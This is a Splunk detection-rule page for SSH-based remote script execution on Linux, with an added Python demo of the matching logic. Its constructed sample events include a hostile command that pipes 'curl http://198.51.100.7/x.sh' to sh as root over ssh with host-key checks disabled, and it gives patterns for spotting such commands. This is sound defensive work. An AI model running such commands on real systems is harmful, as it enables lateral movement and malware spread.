Linux SSH Remote Services Script Execute

Splunk Security Content

Summary
This detection identifies SSH command executions on Linux endpoints that look like lateral movement or remote script execution. It uses process telemetry from Endpoint Detection and Response (EDR) agents, normalized into Splunk's Endpoint.Processes data model, and looks for processes named ssh whose command line carries the non-interactive -o options StrictHostKeyChecking, ConnectTimeout or BatchMode (matched as the substrings oStrictHostKeyChecking, oConnectTimeout and oBatchMode) together with an HTTP or HTTPS URL. That combination, which suppresses host-key prompts, bounds the connect time, disables password prompts and fetches content from a web server on the remote side, is characteristic of scripted attempts to run code on other hosts, and such attempts may escalate privileges, compromise additional systems or spread malware across the network. Matching events are correlated through the Processes data model and raised as alerts; known-good automation that legitimately uses these options can be excluded through the rule's filter.
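As an added illustration of the matching logic (not the Splunk search itself and not Splunk's code), the Python below applies the same three conditions (process name ssh, one of the monitored -o options, an http:// or https:// URL in the command line) to a handful of constructed EDR process events whose field names mirror the Endpoint.Processes data model. The hosts, users, URLs and the `allowlist` parameter standing in for the rule's false-positive filter are all assumptions for the example. It goes slightly beyond the page in one respect: it accepts both `-oStrictHostKeyChecking=no` and the spaced `-o StrictHostKeyChecking=no`, which a plain substring match on `oStrictHostKeyChecking` would miss.

```python
"""Toy re-implementation of the 'Linux SSH Remote Services Script Execute'
matching logic over constructed EDR process events.  Added example, not the
Splunk search; field names (dest, user, process_name, process) follow the
Endpoint.Processes data model but every event below is made up."""
import re
import shlex

# Monitored ssh -o options.  ssh_config keywords are case-insensitive, and the
# option may be written "-oKey=val" or "-o Key=val"; accept both spellings.
OPTION_RE = re.compile(
    r"-o\s*(StrictHostKeyChecking|ConnectTimeout|BatchMode)\b", re.IGNORECASE)

# Any http:// or https:// URL in the command line (the rule's "HTTP and HTTPS").
URL_RE = re.compile(r"https?://[^\s'\"|;&>]+", re.IGNORECASE)

# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    {"dest": "web01", "user": "deploy", "process_name": "ssh",
     "process": "ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 "
                "root@10.0.0.5 'curl -s http://198.51.100.7/x.sh | sh'"},
    {"dest": "build02", "user": "jenkins", "process_name": "ssh",
     "process": "ssh -o StrictHostKeyChecking=no deploy@staging "
                "'curl -fsSL https://artifacts.example.internal/release.tgz -o /tmp/r.tgz'"},
    {"dest": "build02", "user": "jenkins", "process_name": "ssh",
     "process": "ssh -oBatchMode=yes git@github.com"},              # option, no URL
    {"dest": "db01", "user": "oracle", "process_name": "sshd",
     "process": "sshd: oracle [priv]"},                             # not the ssh client
    {"dest": "web01", "user": "deploy", "process_name": "ssh",
     "process": "ssh -oStrictHostKeyChecking=no root@10.0.0.5 uptime"},  # option, no URL
    {"dest": "web01", "user": "deploy", "process_name": "ssh",
     "process": "ssh root@10.0.0.5 'curl -s http://198.51.100.7/x.sh | sh'"},  # URL, no option
]


def ssh_options(cmdline):
    """Return the monitored -o options present in an ssh command line, lowercased."""
    return {m.group(1).lower() for m in OPTION_RE.finditer(cmdline)}


def urls(cmdline):
    """Return every http/https URL found in the command line, in order."""
    return URL_RE.findall(cmdline)


def remote_target(cmdline):
    """Best-effort user@host extraction for triage: the first non-option token
    containing '@'.  Falls back to whitespace splitting on unbalanced quotes."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:
        tokens = cmdline.split()
    for tok in tokens[1:]:
        if not tok.startswith("-") and "@" in tok:
            return tok
    return None


def detect(events, allowlist=frozenset()):
    """Apply the three conditions to each event and return the hits.

    `allowlist` is a hypothetical set of (dest, user) pairs that plays the
    role of the rule's false-positive filter; it is not Splunk's filter macro."""
    hits = []
    for ev in events:
        if ev.get("process_name") != "ssh":
            continue
        cmdline = ev.get("process", "")
        opts = ssh_options(cmdline)
        found = urls(cmdline)
        if not opts or not found:          # both conditions are required
            continue
        if (ev.get("dest"), ev.get("user")) in allowlist:
            continue
        hits.append({
            "dest": ev.get("dest"),
            "user": ev.get("user"),
            "target": remote_target(cmdline),
            "options": sorted(opts),
            "urls": found,
            "technique": "T1021.004",
        })
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS, allowlist={("build02", "jenkins")}):
        print(hit)
```

Running the block with the CI host/user allowlisted leaves a single hit, the web01 event that fetches and pipes a script to sh on the remote host. The last sample event shows the rule's blind spot: an operator who omits the -o options but still fetches a URL over ssh is not matched, so this detection should sit alongside broader ssh and curl/wget execution monitoring rather than replace it.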
Categories
  • Linux
  • Endpoint
Data Sources
  • Pod
  • Container
  • User Account
  • Process
ATT&CK Techniques
  • T1021.004
Created: 2024-11-13